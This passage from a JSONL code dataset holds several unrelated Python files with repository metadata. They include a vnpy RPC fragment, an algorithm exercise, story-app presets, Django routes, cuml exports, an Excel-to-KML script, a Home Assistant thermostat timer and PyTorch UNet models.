topic)\n\n def on_disconnected(self):\n \"\"\"\n Callback when heartbeat is lost.\n \"\"\"\n print(\"RpcServer has no response over {tolerance} seconds, please check you connection.\"\n .format(tolerance=KEEP_ALIVE_TOLERANCE.total_seconds()))\n\n\ndef generate_certificates(name: str) -> None:\n \"\"\"\n Generate CURVE certificate files for zmq authenticator.\n \"\"\"\n keys_path = Path.cwd().joinpath(\"certificates\")\n if not keys_path.exists():\n os.mkdir(keys_path)\n\n zmq.auth.create_certificates(keys_path, name)","repo_name":"xiqicpt/master-vnpy","sub_path":"vnpy/rpc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11648,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"57"} +{"seq_id":"38974254718","text":"line = input()\nbridge = [input(), input()]\nlength = len(bridge[0])\ndp = [[0] * length + [1] for _ in range(2)]\nconverter = {'R': 0, 'I': 1, 'N': 2, 'G': 3, 'S': 4}\nRINGS_idxes = [[[] for __ in range(2)] for _ in range(5)] + [[[-1], [-1]]] # [r, i, n, g, s]\nfor i in range(2):\n for j in range(length):\n c_idx = converter[bridge[i][j]]\n RINGS_idxes[c_idx][i].append(j)\n # elif bridge[i][j] == 'I':\n # RINGS_idxes[1][i].append(j)\n # elif bridge[i][j] == 'N':\n # RINGS_idxes[2][i].append(j)\n # elif bridge[i][j] == 'G':\n # RINGS_idxes[3][i].append(j)\n # elif bridge[i][j] == 'S':\n # RINGS_idxes[4][i].append(j)\n\nlast_c_idx = 5\nfor l in line:\n temp_nxt = []\n for i in range(2):\n last_length = len(RINGS_idxes[last_c_idx][not i])\n c_idx = converter[l]\n for c in RINGS_idxes[c_idx][i]:\n least_idx = 0\n nxt = 0\n while least_idx < last_length:\n least_c = RINGS_idxes[last_c_idx][not i][least_idx]\n if least_c < c:\n nxt += dp[not i][least_c]\n least_idx += 1\n else:\n break\n\n temp_nxt.append(nxt)\n\n for i in range(2):\n for c in RINGS_idxes[c_idx][i]:\n dp[i][c] = temp_nxt.pop(0)\n last_c_idx = c_idx\n\ntotal = 0\nfor i in range(2):\n for c in RINGS_idxes[c_idx][i]:\n total += dp[i][c]\n\nprint(total)\n","repo_name":"leeholeo/Algorithm_study","sub_path":"high_study/week_12/2602_cross_a_stone_bridge.py","file_name":"2602_cross_a_stone_bridge.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"25755973950","text":"\"\"\"\nStoryPresets.py\n\nA reference implementation of preset objects (communications, creative context, etc.) 
for story domain.\n\nTODO: consider migrating this as a common component of the main Creative Wand framework.\n\n\"\"\"\nfrom os import path\n\nfrom StorytellingDomain.Application.Instances.Communications.Echo import EchoComm\nfrom StorytellingDomain.Application.Instances.Communications.FeedbackComm import FeedbackComm\nfrom StorytellingDomain.Application.Instances.Communications.OpeningMessage import OpeningMessageComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.CARP.CARPFindLineByCriticComm import \\\n CARPFindLineByCriticComm, CARPOutOfTopicDetectionComm, CARPFindLineByDefaultCriticComm, CARPOOTDOnLastSentence, \\\n CARPFindByDefaultCriticComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.InspirationComm import InspirationComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.RequestGeneration import GenerateComm, \\\n GenerateWithFreezeComm, GenerateCommV2\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.ResetAreaComm import ResetAreaComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.ShowGenerated import ShowGeneratedComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.SuggestSentenceComm import SuggestSentenceComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.TopicRegenerationComm import \\\n TopicRegenerationComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.UserProvideSketch import UserSketchComm\nfrom StorytellingDomain.Application.Instances.Communications.StoryContext.UserWorkComm import UserWorkComm\nfrom StorytellingDomain.Application.Instances.Communications.UndoCommunication import UndoComm\nfrom StorytellingDomain.Application.Instances.CreativeContext.StoryCreativeContext import StoryCreativeContext\nfrom StorytellingDomain.Application.Instances.ExperienceManager.SimpleExperienceManager import SimpleExperienceManager\nfrom StorytellingDomain.Application.Instances.Frontend.WebFrontend import WebFrontend\nfrom CreativeWand.Utils.Misc.FileUtils import relative_path\n\n\n# If you need to add new entries (new communications, differet types of frontend, experience managers, etc.)\n# Add an entry in the import above, then add it to either `class_name_to_type` or `comm_list_objects`.\n\n# Here, we define a string to class type translation dict to help us define a Creative Wand setup by these names.\n# As they share common interfaces, this allows plug-and-play ness of setting up Creative Wand using modules.\n\nclass_name_to_type = {\n \"ExperienceManager\": SimpleExperienceManager,\n \"Frontend\": WebFrontend,\n \"CreativeContext\": StoryCreativeContext,\n}\n\n\"\"\"\nSpecifically for communications, we use this dictionary.\nvalid value formats in this dictionarys are as follows:\n\n- type\nIf a single type is provided, a communication object will be created with no parameters.\n\n- [type, dict]\nIf a list is provided, the first item will be interpreted as the `type` of the communication.\nThe second item, a `dict`, will be parsed as `**kwargs` to the communication.\n\"\"\"\n\n\ncomm_list_objects = {\"OpeningMessageComm\": OpeningMessageComm, \"EchoComm\": EchoComm,\n \"FeedbackComm\": [FeedbackComm, dict(description=\"Report goal completion.\",\n question_to_ask=\"Which subgoal did we achieve?\",\n options=[\n \"Start by talking about Business\",\n \"Ending in talking about Sports\",\n \"Mentioning Soccer\",\n ]\n )],\n \"UserSketchComm\": UserSketchComm,\n 
\"ShowGeneratedComm\": ShowGeneratedComm, \"GenerateWithSketchComm\": ShowGeneratedComm,\n \"GenerateComm\": GenerateComm, \"GenerateWithFreezeComm\": GenerateWithFreezeComm,\n \"GenerateComm_nosketch\": [GenerateComm, dict(allow_no_sketch=True)],\n \"GenerateWithFreezeComm_nosketch\": [GenerateWithFreezeComm, dict(allow_no_sketch=True)],\n \"GenerateCommV2\": GenerateCommV2,\n \"UserWorkComm\": UserWorkComm, \"InspirationComm\": InspirationComm,\n \"TopicRegenerationComm\": TopicRegenerationComm, \"SuggestSentenceComm\": SuggestSentenceComm,\n \"ResetAreaComm\": ResetAreaComm,\n \"FeedbackSubgoalAchieved\": [FeedbackComm, dict(\n description=\"Report to us on achieving subgoals.\",\n question_to_ask=\"Which subgoal did we achieve? (1 to 3, or None)?\"\n )],\n \"CARPFindLineByCriticComm\": CARPFindLineByCriticComm,\n \"CARPFindLineByDefaultCriticComm\": CARPFindLineByDefaultCriticComm,\n \"CARPFindByDefaultCriticComm\": CARPFindByDefaultCriticComm,\n \"CARPTopicComm\": CARPOutOfTopicDetectionComm,\n # \"CARPOOTDOnLastSentenceComm\":CARPOOTDOnLastSentence,\n \"UndoComm\": UndoComm,\n }\n\n\"\"\"\nThis defines groups of communications to be used in a Creative Wand setup.\n\"\"\"\ncomm_list_presets = {\n # \"s1_local_only\": [\n # \"OpeningMessageComm\",\n # \"FeedbackComm\",\n # \"ResetAreaComm\",\n # \"FeedbackSubgoalAchieved\",\n # \"GenerateComm_nosketch\",\n # \"GenerateWithFreezeComm_nosketch\",\n # \"UserWorkComm\",\n # \"CARPFindLineByCriticComm\",\n # ], \"s1_global_only\": [\n # \"OpeningMessageComm\",\n # \"FeedbackComm\",\n # \"ResetAreaComm\",\n # \"FeedbackSubgoalAchieved\",\n # \"UserSketchComm\",\n # \"GenerateWithSketchComm\",\n # ],\n \"s2_test\": [\n \"UndoComm\",\n \"UserSketchComm\",\n \"TopicRegenerationComm\",\n \"SuggestSentenceComm\",\n \"UserWorkComm\",\n \"GenerateCommV2\",\n \"CARPFindLineByCriticComm\",\n \"CARPFindLineByDefaultCriticComm\",\n \"CARPFindByDefaultCriticComm\",\n \"CARPTopicComm\",\n \"FeedbackComm\",\n ], \"test\": list(comm_list_objects.keys())}\n\n\"\"\"\nEach session will be initiated with a mode described below.\n\nPlease also see how these information is used by the session creator in:\nStorytellingDomain.Application.Instances.Frontend.WebFrontendHelper.WebFrontendServer.WebFrontendServer.home\n\n`filtering_tags` is a special key that is used to simplify ablation building.\nA communication has to \n- has a `list`-type `tag` attribute\n- at least has one item in its `tag` that also exists in `filtering_args`\nOr it will be removed from the communication list and not exist in the final session.\n\nFor example, if a Communication has tag `[1,2]` and\n- `filtering_tags = [3,4]` : This will not be included;\n- `filtering_tags = [2,3]` : This WILL be included.\n\n\n\"\"\"\nstory_mode_table = {\n \"test\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False}},\n # \"local\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n # \"presets\": \"s1_local_only\", \"goal\": \"story_goal_stub\"},\n # \"global\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n # \"presets\": \"s1_global_only\", \"goal\": \"story_goal_stub\"},\n \"s2_f\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False}},\n # \"rl\": 
{\"experience_manager_class_name\": \"RLEM\", \"domain\": \"story\", \"presets\": \"s1_local_only\",\n # \"goal\": \"story_goal_stub\"},\n \"s2_h\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"human\"]},\n \"s2_a\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"agent\"]},\n \"s2_g\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"global\"]},\n \"s2_l\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"local\"]},\n \"s2_e\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"elaboration\"]},\n \"s2_r\": {\"experience_manager_class_name\": \"ExperienceManager\", \"domain\": \"story\",\n \"presets\": \"s2_test\", \"em_args\": {\"use_carp_for_options\": True, \"enable_interrupt\": False},\n \"filtering_tags\": [\"general\", \"reflection\"]},\n}\n\n\ndef generate_goal_message(mode_description):\n \"\"\"\n Generate default goal message.\n \"\"\"\n basepath = path.dirname(__file__)\n filepath = path.abspath(path.join(basepath, \"StoryGoalMessage.md\"))\n goal_str = open(filepath, \"r\").read()\n message = goal_str.format(\n goal_info=\"Create a story that \\n* Start by talking about Business; \\n* Ending in talking about Sports; and\\n * Mentions soccer.\"\n )\n return message\n\n\nfor key in story_mode_table:\n if \"goal\" not in story_mode_table[key]:\n story_mode_table[key][\"goal\"] = generate_goal_message(story_mode_table[key])\n\n\ndef create_comms_from_preset(name: str) -> list:\n \"\"\"\n Instantiate all communications based on the name for the preset.\n :param name: preset name.\n :return: all instantiated communications (Still needs bi\n \"\"\"\n result = []\n try:\n comm_list = get_preset(name)\n except KeyError:\n raise KeyError(\"Unknown preset for exp_setup: %s\" % name)\n if comm_list is not None:\n for item in comm_list:\n result.append(o(item))\n return result\n # sem.register_communication(o(item))\n # print(\"Registered: Frontend # %s\" % sem.frontend.id)\n\n\ndef get_preset(name: str) -> list:\n \"\"\"\n Get a preset communication list from the preset dictionary.\n :param name: key for the comm list.\n :return: the comm list.\n \"\"\"\n return comm_list_presets[name]\n\n\ndef o(name: str) -> object:\n \"\"\"\n Get an object from comm_list_objects.\n :param name: key\n :return: value\n \"\"\"\n entry = comm_list_objects[name]\n if type(entry) is list:\n result = entry[0](**entry[1])\n else:\n result = entry()\n print(\"Created object: %s\" % result)\n return result\n\n# if __name__ == '__main__':\n# # Generate yml equivalent of presets.\n# import yaml\n# with open('story_runs.yaml','w') as file:\n# yaml.dump(story_mode_table,file)\n# with open('story_modes.yaml','w') as file:\n# 
yaml.dump(comm_list_presets,file)\n","repo_name":"eilab-gt/beyond-prompts-experiment","sub_path":"StorytellingDomain/Application/Deployment/Presets/StoryPresets.py","file_name":"StoryPresets.py","file_ext":"py","file_size_in_byte":11546,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"57"} +{"seq_id":"29509083528","text":"from django.conf.urls import url, include\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.equipo_listar, name ='equipo_listar'),\n url(r'^equipo/nuevo/$', views.equipo_nuevo, name='equipo_nuevo'),\n url(r'^equipo/(?P[0-9]+)/$', views.equipo_detalle, name='equipo_detalle'),\n url(r'^equipo/(?P[0-9]+)/editar/$', views.equipo_editar, name='equipo_editar'),\n url(r'^equipo/(?P\\d+)/remover/$', views.equipo_remover, name='equipo_remover'),\n url(r'^jugador/nuevo/$', views.jugador_nuevo, name= 'jugador_nuevo'),\n url(r'^jugador/lista/$', views.jugador_listar, name = 'jugador_listar'),\n url(r'^jugador/(?P[0-9]+)/$', views.jugador_detalle, name='jugador_detalle'),\n url(r'^jugador/(?P[0-9]+)/editar/$', views.jugador_editar, name='jugador_editar'),\n url(r'^jugador/(?P\\d+)/remover/$', views.jugador_remover, name='jugador_remover'),\n ]\n","repo_name":"Josephe23/torneo","sub_path":"equipos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"18652230149","text":"from cuml.model_selection import train_test_split\nfrom cuml.preprocessing.LabelEncoder import LabelEncoder\nfrom cuml.preprocessing.label import LabelBinarizer, label_binarize\nfrom cuml.preprocessing.encoders import OneHotEncoder\nfrom cuml.preprocessing.TargetEncoder import TargetEncoder\nfrom cuml.preprocessing import text\n\nfrom cuml._thirdparty.sklearn.preprocessing import (\n Binarizer,\n FunctionTransformer,\n KBinsDiscretizer,\n KernelCenterer,\n MaxAbsScaler,\n MinMaxScaler,\n MissingIndicator,\n Normalizer,\n PolynomialFeatures,\n PowerTransformer,\n QuantileTransformer,\n RobustScaler,\n SimpleImputer,\n StandardScaler,\n)\n\nfrom cuml._thirdparty.sklearn.preprocessing import (\n add_dummy_feature,\n binarize,\n maxabs_scale,\n minmax_scale,\n normalize,\n power_transform,\n quantile_transform,\n robust_scale,\n scale,\n)\n\n\n__all__ = [\n # Classes\n \"Binarizer\",\n \"FunctionTransformer\",\n \"KBinsDiscretizer\",\n \"KernelCenterer\",\n \"LabelBinarizer\",\n \"LabelEncoder\",\n \"MaxAbsScaler\",\n \"MinMaxScaler\",\n \"MissingIndicator\",\n \"Normalizer\",\n \"OneHotEncoder\",\n \"PolynomialFeatures\",\n \"PowerTransformer\",\n \"QuantileTransformer\",\n \"RobustScaler\",\n \"SimpleImputer\",\n \"StandardScaler\",\n \"TargetEncoder\",\n # Functions\n \"add_dummy_feature\",\n \"binarize\",\n \"label_binarize\",\n \"maxabs_scale\",\n \"minmax_scale\",\n \"normalize\",\n \"power_transform\",\n \"quantile_transform\",\n \"robust_scale\",\n \"scale\",\n \"train_test_split\",\n # Modules\n \"text\",\n]\n","repo_name":"rapidsai/cuml","sub_path":"python/cuml/preprocessing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":3661,"dataset":"github-code","pt":"57"} +{"seq_id":"33441150679","text":"import random\nimport time\nfrom typing import Literal\nfrom board import Board\n\nfrom engines.engine import IEngine\n\n\nclass RandomEngine(IEngine):\n \"\"\"\n Engine always choosing random moves from all possible\n\n \"\"\"\n\n def __init__(\n 
self,\n        color: Literal[\"@\", \"O\"],\n        current_board: Board,\n        timer: bool = False,\n    ) -> None:\n        self.color = color\n        self.board = current_board\n        self.timer = timer\n        print(f\"Random engine discs: {self.color}\\n\")\n\n    def perform_move(self):\n        possible_moves = self.board.find_possible_moves_for_player(self.color)\n        start = time.time()\n        move = random.choice(possible_moves)\n        end = time.time()\n\n        if self.timer:\n            print(\n                f\"Random engine move: (new disc position, discs to flip) = {move}, time: {end - start}\"\n            )\n\n        return move\n","repo_name":"batmatt/wsi-course-labs","sub_path":"deterministic_games_reversi/engines/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"}
+{"seq_id":"779326706","text":"import openpyxl\r\nimport simplekml\r\nimport os\r\n\r\n\r\ndef exceltodict(filename, sheetname):\r\n    \"\"\"\r\n    filename is a string\r\n    sheetname is a string\r\n    returns geodict:\r\n        names as keys, strings\r\n        coordinates as values, strings\r\n    \"\"\"\r\n\r\n    book = openpyxl.load_workbook(filename)\r\n    sheet = book[sheetname]\r\n\r\n    colm = {}\r\n\r\n    j = 1\r\n    while (sheet.cell(row=1, column=j).value) is not None:\r\n        if str(sheet.cell(row=1, column=j).value) in [\"Name\", \"Nombre\", \"NAME\", \"NOMBRE\", \"IE\"]:\r\n            colm[\"NAMES\"] = j\r\n        elif str(sheet.cell(row=1, column=j).value) in [\"LAT\", \"Lat\"]:\r\n            colm[\"LATS\"] = j\r\n        elif str(sheet.cell(row=1, column=j).value) in [\"LONG\", \"Long\"]:\r\n            colm[\"LONGS\"] = j\r\n        elif \"NAMES\" in colm and \"LATS\" in colm and \"LONGS\" in colm:  # If all columns are in colm then stop\r\n            break\r\n        j += 1\r\n\r\n    geodict = {}\r\n\r\n    i = 2\r\n    while (sheet.cell(row=i, column=1).value) is not None:\r\n        name = str(sheet.cell(row=i, column=colm[\"NAMES\"]).value)\r\n        lat = str(sheet.cell(row=i, column=colm[\"LATS\"]).value)\r\n        long = str(sheet.cell(row=i, column=colm[\"LONGS\"]).value)\r\n        geodict[name] = long + \",\" + lat\r\n        i += 1\r\n\r\n    return geodict\r\n\r\n\r\ndef dicttoKMLfolder(datadict):\r\n    \"\"\"\r\n    datadict is a dictionary with:\r\n        names as keys, strings\r\n        long and lat as values, strings\r\n    returns a KML document holding a folder of points\r\n    \"\"\"\r\n    kml = simplekml.Kml()\r\n    folder = kml.newfolder(name=\"Points\")\r\n    for name, coords in datadict.items():\r\n        # values are stored as \"long,lat\" strings\r\n        lon, lat = coords.split(\",\")\r\n        folder.newpoint(name=name, coords=[(float(lon), float(lat))])\r\n    return kml\r\n\r\n\r\ndef KMLfldtofile(KMLfolder, filename):\r\n    \"\"\"\r\n    filename is a string\r\n    transforms KMLfolder into a KML file\r\n    and writes it with name: filename\r\n    \"\"\"\r\n    KMLfolder.save(filename)\r\n\r\n\r\n# Enter main program\r\n# Set files to read and write\r\nfiletoread = input(\"Insert filename to read\")\r\nfiletoread = filetoread+\".xlsx\"\r\nfiletowrite = filetoread.replace(\".xlsx\", \".kml\")\r\n\r\ndata = exceltodict(filetoread, \"Hoja1\")\r\n\r\n# Print log of exported data\r\nprint(\"Generate points:\")\r\nfor key in data.keys():\r\n    print(key, \":\", data[key])\r\n\r\nfolder = dicttoKMLfolder(data)\r\nKMLfldtofile(folder, filetowrite)\r\n\r\n# Messages to end program\r\nprint(\"KML wrote with name\", filetowrite)\r\ninput(\"Press key to end\")\r\n","repo_name":"alejjjano/ExcelEdit","sub_path":"XLS to KML.py","file_name":"XLS to KML.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
+{"seq_id":"74519601459","text":"from datetime import datetime\nimport re\n# Create a file and write the current date into it:\nf = open('today.txt', 'w')\nnow = datetime.now()\nf.write(str(now))\nf.close()\n# Read the line back and look for a match with the pattern:\nwith open('today.txt', 'r') as f:\n    today_string = 
f.readline()\nmatch = re.findall(r'-(.*)-', today_string)\nprint(match)\n\n","repo_name":"itamitut/MyPython","sub_path":"DateTime.py","file_name":"DateTime.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
+{"seq_id":"37060144871","text":"class UndergroundSystem:\n\n    def __init__(self):\n        self.customers_time = dict()\n        self.customers_station = dict()\n        self.total_time = dict()\n        self.count = dict()\n\n    def checkIn(self, id: int, stationName: str, t: int) -> None:\n        self.customers_time[id] = t\n        self.customers_station[id] = stationName\n\n    def checkOut(self, id: int, stationName: str, t: int) -> None:\n        station = self.customers_station[id]\n        time = self.customers_time[id]\n        # key on the (start, end) tuple; concatenating the names could\n        # collide, e.g. \"a\" + \"bc\" == \"ab\" + \"c\"\n        trip = (station, stationName)\n        if trip in self.total_time:\n            self.total_time[trip] += t - time\n            self.count[trip] += 1\n        else:\n            self.total_time[trip] = t - time\n            self.count[trip] = 1\n\n    def getAverageTime(self, startStation: str, endStation: str) -> float:\n        trip = (startStation, endStation)\n        return self.total_time[trip] / self.count[trip]\n\n\n# Your UndergroundSystem object will be instantiated and called as such:\n# obj = UndergroundSystem()\n# obj.checkIn(id,stationName,t)\n# obj.checkOut(id,stationName,t)\n# param_3 = obj.getAverageTime(startStation,endStation)\n","repo_name":"nilax97/leetcode-solutions","sub_path":"solutions/Design Underground System/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"}
+{"seq_id":"34905110625","text":"import logging\n\nfrom ..controlling import control_trv\nfrom homeassistant.core import callback\n\n_LOGGER = logging.getLogger(__name__)\n\n@callback\nasync def trigger_time(self, current_time):\n    \"\"\"\n    Triggered by night mode timer.\n    @param current_time: current time from the timer\n    \"\"\"\n    \n    _is_night = _nighttime(self, current_time)\n    \n    if _is_night is None:\n        _LOGGER.error(\"better_thermostat %s: Error while checking if it is night\", self.name)\n        return\n    elif _is_night:\n        _LOGGER.debug(\"better_thermostat %s: Night mode activated\", self.name)\n        self.last_daytime_temp = self._target_temp\n        self._target_temp = self.night_temp\n        self.night_mode_active = True\n    \n    else:\n        _LOGGER.debug(\"better_thermostat %s: Day mode activated\", self.name)\n        if self.last_daytime_temp is None:\n            _LOGGER.error(\"better_thermostat %s: Could not load last daytime temp; continue using the current setpoint\", self.name)\n        else:\n            self._target_temp = self.last_daytime_temp\n        self.night_mode_active = False\n    \n    self.async_write_ha_state()\n    await control_trv(self)\n\n@callback\ndef _nighttime(self, current_time):\n    \"\"\"\n    Return whether it is nighttime.\n    @param current_time: current time as a datetime/time object\n    @return: bool True if it is nighttime; None if not configured\n    \"\"\"\n    _return_value = None\n    \n    # one or more of the inputs is None or empty\n    if not all([self.night_start, self.night_end, current_time]):\n        return _return_value\n    \n    # fetch to instance variables, since we might want to swap them\n    start_time, end_time = self.night_start, self.night_end\n    \n    # if later set to true we'll swap the variables and output boolean, 'cause we use the logic backwards\n    # if the nighttime passes not over midnight, like (01:00 to 05:00) we use the inverted logic\n    # while something like 23:00 to 05:00 would use the default\n    _reverse = False\n    \n    if start_time.hour < 
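# The _nighttime() helper above compares hour/minute fields by hand and swaps
# the endpoints for non-wrapping windows. datetime.time objects compare
# directly, which reduces the whole check to two cases (standalone sketch):
from datetime import time

def in_window(now, start, end):
    if start <= end:                   # e.g. 01:00-05:00, no midnight wrap
        return start <= now < end
    return now >= start or now < end   # e.g. 23:00-05:00, wraps midnight

assert in_window(time(23, 30), time(23, 0), time(5, 0))
assert in_window(time(2, 0), time(23, 0), time(5, 0))
assert not in_window(time(12, 0), time(23, 0), time(5, 0))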
end_time.hour or (start_time.hour == end_time.hour and start_time.minute < end_time.minute):\n # not passing midnight, so we use the inverted logic\n _reverse = True\n start_time, end_time = end_time, start_time\n \n # if we are after the start time, but before the end time, we are in the night\n if (current_time.hour > start_time.hour or (\n current_time.hour == start_time.hour and current_time.minute >= start_time.minute)) and current_time.hour < end_time.hour or (\n current_time.hour == end_time.hour and current_time.minute < end_time.minute):\n _return_value = True\n \n # flip output, since we flipped the start/end time\n if _reverse:\n return not _return_value\n return _return_value","repo_name":"sensei73/better_thermostat","sub_path":"custom_components/better_thermostat/events/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"4675538846","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass EncDecModel(nn.Module):\n \"\"\"\n Basic encoder decoder NN\n \"\"\"\n\n def __init__(self, in_channels, out_channels, conv_channels=64):\n super().__init__()\n\n # encoder (downsampling)\n self.enc_conv0 = nn.Conv2d(in_channels, conv_channels, 3, padding=1)\n self.pool0 = nn.MaxPool2d(2, 2) # 128 -> 64\n self.enc_conv1 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.pool1 = nn.MaxPool2d(2, 2) # 64 -> 32\n self.enc_conv2 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.pool2 = nn.MaxPool2d(2, 2) # 32 -> 16\n self.enc_conv3 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.pool3 = nn.MaxPool2d(2, 2) # 16 -> 8\n\n # bottleneck\n self.bottleneck_conv = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n\n # decoder (upsampling)\n self.upsample0 = nn.Upsample(16) # 8 -> 16\n self.dec_conv0 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.upsample1 = nn.Upsample(32) # 16 -> 32\n self.dec_conv1 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.upsample2 = nn.Upsample(64) # 32 -> 64\n self.dec_conv2 = nn.Conv2d(conv_channels, conv_channels, 3, padding=1)\n self.upsample3 = nn.Upsample(128) # 64 -> 128\n self.dec_conv3 = nn.Conv2d(conv_channels, out_channels, 3, padding=1)\n\n def forward(self, x):\n # encoder\n e0 = self.pool0(F.relu(self.enc_conv0(x)))\n e1 = self.pool1(F.relu(self.enc_conv1(e0)))\n e2 = self.pool2(F.relu(self.enc_conv2(e1)))\n e3 = self.pool3(F.relu(self.enc_conv3(e2)))\n\n # bottleneck\n b = F.relu(self.bottleneck_conv(e3))\n\n # decoder\n d0 = F.relu(self.dec_conv0(self.upsample0(b)))\n d1 = F.relu(self.dec_conv1(self.upsample1(d0)))\n d2 = F.relu(self.dec_conv2(self.upsample2(d1)))\n d3 = self.dec_conv3(self.upsample3(d2)) # no activation\n return d3\n\n\nclass UNet(nn.Module):\n def __init__(self):\n super().__init__()\n\n # encoder (downsampling)\n self.enc_conv0 = nn.Sequential(\n nn.Conv2d(3, 64, 3, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n nn.Conv2d(64, 64, 3, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n )\n self.pool0 = nn.MaxPool2d(2, stride=2)\n\n self.enc_conv1 = nn.Sequential(\n nn.Conv2d(64, 128, 3, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n nn.Conv2d(128, 128, 3, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n )\n self.pool1 = nn.MaxPool2d(2, stride=2)\n\n self.enc_conv2 = nn.Sequential(\n nn.Conv2d(128, 256, 3, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n nn.Conv2d(256, 256, 3, padding=1),\n 
nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n )\n self.pool2 = nn.MaxPool2d(2, stride=2)\n\n self.enc_conv3 = nn.Sequential(\n nn.Conv2d(256, 512, 3, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n nn.Conv2d(512, 512, 3, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n )\n self.pool3 = nn.MaxPool2d(2, stride=2)\n\n # bottleneck\n self.bottleneck_conv = nn.Sequential(\n nn.Conv2d(512, 1024, 3, padding=1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(),\n nn.Conv2d(1024, 1024, 3, padding=1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(),\n )\n\n # decoder (upsampling)\n self.upconv3 = nn.ConvTranspose2d(1024, 512, 2, stride=2)\n self.dec_conv3 = nn.Sequential(\n nn.Conv2d(1024, 512, 3, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n nn.Conv2d(512, 512, 3, padding=1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(),\n )\n\n self.upconv2 = nn.ConvTranspose2d(512, 256, 2, stride=2)\n self.dec_conv2 = nn.Sequential(\n nn.Conv2d(512, 256, 3, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n nn.Conv2d(256, 256, 3, padding=1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(),\n )\n\n self.upconv1 = nn.ConvTranspose2d(256, 128, 2, stride=2)\n self.dec_conv1 = nn.Sequential(\n nn.Conv2d(256, 128, 3, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n nn.Conv2d(128, 128, 3, padding=1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n )\n\n self.upconv0 = nn.ConvTranspose2d(128, 64, 2, stride=2)\n self.dec_conv0 = nn.Sequential(\n nn.Conv2d(128, 64, 3, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n nn.Conv2d(64, 64, 3, padding=1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n )\n\n self.final_conv 